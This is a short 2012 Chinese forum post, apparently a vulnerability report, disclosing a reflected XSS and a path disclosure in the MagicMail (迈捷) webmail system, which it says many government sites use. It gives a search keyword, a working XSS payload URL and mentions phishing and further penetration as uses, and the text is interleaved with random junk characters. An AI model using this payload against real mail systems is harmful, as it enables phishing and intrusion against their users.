今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
L% V R) z! c7 F# w) B$ O- @( z j! k0 C0 r7 {4 h
5 r2 O% z$ G3 V* T3 a1 |包含 一个反射性XSS 以及 绝对路径泄漏
3 S6 i. ^: ~7 d0 W# z1 l看了看 貌似全部是linux的。5 X- ~, h+ P2 B9 b& w
) m9 |1 n; Z/ d" r- R. G4 J
关键字:迈捷邮件系统 by MagicMail8 I) G7 a' V" W+ A
, d) g7 x2 ^+ R1 f0 T4 d3 ?可以看到很多政府网站都用这个邮件系统
3 s# F$ Q' _- z. o& \
6 j1 \6 {( C' o# Z: ^/ ]# |绝对路径 http://madman.in/index.php?login_type=declare&language=
, I. z# Z( y" V. I( l' d+ Y& O+ _/ l0 z$ b( d# S# n
6 G. p% [9 w+ L( P
, O: C2 {1 w! b6 L4 \XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E7 x5 R( y" N# {. D S4 X7 S7 H
; T& m S) |4 X2 e. t- @
* H6 i) L' C+ ^* i
5 B* _6 M3 T1 B6 v+ D虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
! i5 j1 C% @7 P9 P4 Z( s7 F 0 e0 e2 f" s7 k$ r; c: h
修复方案:看官方补丁吧。 ~5 Z7 \; r5 Y! Y6 B; e5 @
|
发表于 2012-11-9 20:38:41
收藏
支持
反对